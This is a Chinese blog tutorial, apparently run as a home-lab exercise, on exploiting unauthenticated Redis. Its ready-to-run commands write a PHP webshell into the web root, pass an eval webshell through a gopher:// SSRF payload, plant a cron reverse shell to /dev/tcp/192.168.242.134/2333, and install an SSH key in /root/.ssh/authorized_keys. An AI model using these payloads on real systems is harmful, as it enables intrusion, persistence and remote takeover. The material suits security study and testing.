Redis未授权

最新推荐文章于 2024-11-06 00:13:21 发布
最新推荐文章于 2024-11-06 00:13:21 发布
阅读量377 收藏 7
点赞数 7
分类专栏: 内网渗透 文章标签: redis web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79441074/article/details/135433830
版权
本文详细描述了如何在Redis服务器上进行未授权攻击,包括利用默认无认证、写入Webshell、SSH公钥获取免密登录权限以及结合SSRF漏洞执行命令的过程。文章还提供了CentOS系统上安装和配置Redis的具体步骤。
摘要由CSDN通过智能技术生成

概述

        Redis在内网渗透中比较常见,在扫描的时候扫描出6379的端口号就可以尝试一个redis未授权的攻击

攻击前提:        

        安装启动的时候默认不需要认证,并且redis可以向服务器写入文件

攻击思路

如果改redis所在服务器有web服务,可以直接在根目录下写一句话木马直接连接

如果存在ssh服务,直接写入公钥,实现免密码登陆

也可以写个脚本在计划任务里

部署环境

centos安装Redis

进入yum源目录下,下载redis网络源

cd /etc/yum.repos.d

wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo

yum install -y http://rpms.famillecollet.com/enterprise/remi-release-7.rpm

yum install redis* -y        安装redis

启动redis

redis-server

直接客户端连接,发现可以直接连接 

写入WEB根目录文件 
flushall

config set dir /var/www/html

config set dbfilename shell.php

set 'webshell' '<?php phpinfo();?>'     //相当于key value值

save

quit

 查看文件存在

成功写入

 redis配合ssrf

利用ssrf漏洞的gopher协议一些执行命令

gopher协议支持发出GETPOST请求,gopher 协议可以在特定的端口上进行相关命令的执行

redis配合ssrf进行写入一句话木马

gopher://127.0.0.1:6379/_set 1 "<?php eval($_POST[1]); ?>" 
config set dir /var/www/html/ 
config set dbfilename shell.php 
save

url编码后

gopher://127.0.0.1:6379/_set%201%20%22%3C%3Fphp%20eval(%24_POST%5B1%5D)%3B%20%3F%3E%22%20%0Aconfig%20set%20dir%20%2Fvar%2Fwww%2Fhtml%2F%20%0Aconfig%20set%20dbfilename%20shell.php%20%0Asave%0A

redis写入反弹shell到计划任务里

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.242.134/2333 0>&1\n\n\n\n" 
config set dir /etc 
config set dbfilename crontab 
save

redis写入ssh公钥实现免密码登陆ssh

redis写入ssh公钥

config set dir /root/.ssh/ 
config set dbfilename authorized_keys 
set margin "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDbC05xE4PBAEOdBbF4F6Eai//NjL6fAkWSyotaz7Xoc33QfbzxNXz/3iDvfQTD4PIjznc17+9C1TcjV4dyrYdaC0w2JxnsRmiECrfNlRVkkkx6l/jFV0WH5P7ziYATMtVRkuhCm3wbqG0q8w8UyW5FeqB2N17rHr+wxGctDmuPGNbObbvGSvGVe5S73Uw1WwI08n3oqTjoi2dSu/FuDwVyzCbQXqQfr/5832tchX2jYl+1KzDSCRENoacj8RiIxUOEwvzJRFeMQW5qlG6FWfdksKzXwSSJ2TmAOzcHPU4ymimH49SRpOihr5i2N/j9Ts7AdhFepFu7Jkpa/YlwvSu2nDprUaZC93wBOP9Typma56xyhb8ieOEU1QbOWr+tVcqc2ouUmwRO06tv2VqKERRRaGilgarhOOO7kigeVm7t9HUa+ncnP210WqeYwGbSck6nZmbYHVoGThLcavYy+t8Ue1MZPeQhzEqWPlJeHwrddsQY+a2F6XJ/UG6VUx2qUjE= xiu@xiu-PC" 
save 
quit

kali 开启 redis和ssh服务

不过kali的redis版本太高,需要关闭保护设置

vim /etc/redis/redis.conf

设置关闭之后redis就未授权了 

查看kali开启的服务

发现ssh和redis都开启了

开启一台win7安装

点击进入bash解释器

 在命令解释器输入

ssh-keygen -t rsa

authorized_keys

发现生成一个.ssh的文件夹

生成一个公钥和私钥

点开发现

复制公钥,放进受害者主机的ssh目录下

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDK0FLlLRSKNv3vB8VoNDYLtmECpgUMg+eAWa8qCisXEpTDoP78YTgqRghHuKytez2CutHMNblTt23cWB99sZE6vTF60WSXgXVX07abFti7GAQiCuV4hK/W1mxSiX6p+gLeo315c4kPngahu6/GykQerrVrSU7DK3tD45eGxvZlptTKBoZXcEC43PknTHLZ6mIAjO9oXeFi8bRYVdF8Khp/EEoxSfsr3/rF1Fp8bF/dIsmL7qw1xQniqXGU7KbLGNZdDvYtukojfeZe1F8BVHFVyRtfZQhU/omYOnoOPa/GIXUFBcg+KD+tN107QIlz7dZNQXNhMPcXNQteiHlqMOpnoVaAgN9/03/q2O7rlK6ON1mDmuLuspb+T0Mt/UI6XOkDxgtGxDNljyb967/ShG04lLnImkVBgoi2Qpa+XG32WecfH7QJHFW8eZTdaojPQ0iko2gmSe7CONDMIVsYRrYttiwXYaeR0/QJaJ56I11jSqSy1kBL62niqokcINIAqSs= xiu@xiu-PC

将公钥写在哪个家目录下,哪个用户就可以进行ssh免密登陆

我们这里写在kali的家目录下

win7ssh登陆

发现登陆进kali主机

HSY233233
关注
专栏目录
Redis授权利用方式总结
hot_milk1的博客
08-07 867
目前的大多数网站搭建的Redis 均采用 docker 一键部署的方式,而 docker 镜像中的 redis 默认不是以 root 权限运行的,也就是说即使拿下这台 redis,我们也只能在对方服务器的本地内网中漫游,当然还是会有部分 redis 部署在服务器中。
Redis授权最全利用方式
swordheart的博客
01-10 2601
0x00 利用计划任务反弹shell 靶机地址:192.168.230.142 kail地址:192.168.230.128 启动靶机redis docker环境
redis授权访问
san3144393495的博客
06-15 1866
redis非关系型数据库。
Redis授权访问
sheonz的博客
07-25 360
因为Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package攻击者可通过package中的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0中的函数luaopen_io,在Lua中执行这个导出函数,即可获得io库,再使用其执行命令。连接靶机后,设置redis的路径为/root/.ssh/和保存文件名为authorized_keys,然后保存。得到对应的IP和端口,然后利用kali进行授权访问
02-Redis授权访问漏洞
qq_57410330的博客
07-16 1058
详谈redis授权访问漏洞,原理、利用及加固方式
redis授权
weixin_47224111的博客
10-16 2924
0X01redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set()、zset(sorted set –有序)和hash(哈希类型)。 redis很大程度补偿了memcached这类key/value存储的不足,在部分场合可以对关系数据库起到很好的补充作用。它提供了Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang等客户
Redis授权访问漏洞复现
qq_57817668的博客
06-10 1089
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSIC语言编写、支络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis授权访问漏洞
qq_68186313的博客
08-04 290
Redis 默认情况下,会绑定在 8.0.0.0:6379 ,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供。进入目录:cd/vulhub-master/redis/4-unacc。Redis授权访问漏洞。
redis授权漏洞的利用
m0_63615772的博客
04-29 1532
利用这个漏洞我们一般会去实现写入webshell、写入ssh公钥、在crontab里写定时任务,反弹shell这三种,我们依次来实现。攻击机:192.168.112.1(window10)靶机 :192.168.112.188(centos7)
Redis 授权访问
qq_61553520的博客
05-17 593
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行授权访问Redis
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
python脚本实现Redis授权批量提权
12-16
本文主要给大家介绍了关于redis授权批量提权的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧。 安装依赖 sudo easy_install redis 使用 redis python hackredis.py usage: ...
Redis-Getshell:Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
CentOS 7系统下Redis Cluster集群一键部署脚本发布
运维人生
11-02 333
环境准备:自动安装Redis所需的依赖包,并下载Redis源码。Redis安装:编译并安装Redis。配置文件生成:为每个Redis节点生成独立的配置文件。Redis实例启动:根据配置文件启动Redis实例。集群创建:使用redis-cli命令创建Redis Cluster集群。本文提供了一个在CentOS 7系统下Redis Cluster集群的一键部署脚本,帮助开发者快速搭建Redis Cluster集群。来,我们将继续完善该脚本,增加更多的功能和配置选项,以满足不同场景下的需求。
Go 使用 Redis 实现分布式锁
最新发布
qq_37106501的博客
11-06 860
Go 使用 Redis 实现分布式锁
Redis ——发布订阅
weixin_62946182的博客
10-31 542
发布订阅:基于哈希表与链表结构实现 map结构key值保存用户订阅的兴趣事件,而value保存发布者对象信息,以链表的形式连接对同一事件感兴趣的对象,当消息队列中出现关于订阅事件的发布信息时,Redis可以快速的将该信息按照以key值对应的value链表为订阅的转发顺序;
Redis-基本全局命令
ketil27的博客
11-04 361
Redis 有5种数据结构,但它们都是键值对种的值,对于键来说有⼀些通⽤的命令。返回所有满⾜样式(pattern)的key。⽀持如下统配样式。命令有效版本:1.0.0之后时间复杂度:O(N)返回值:匹配pattern的所有key。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值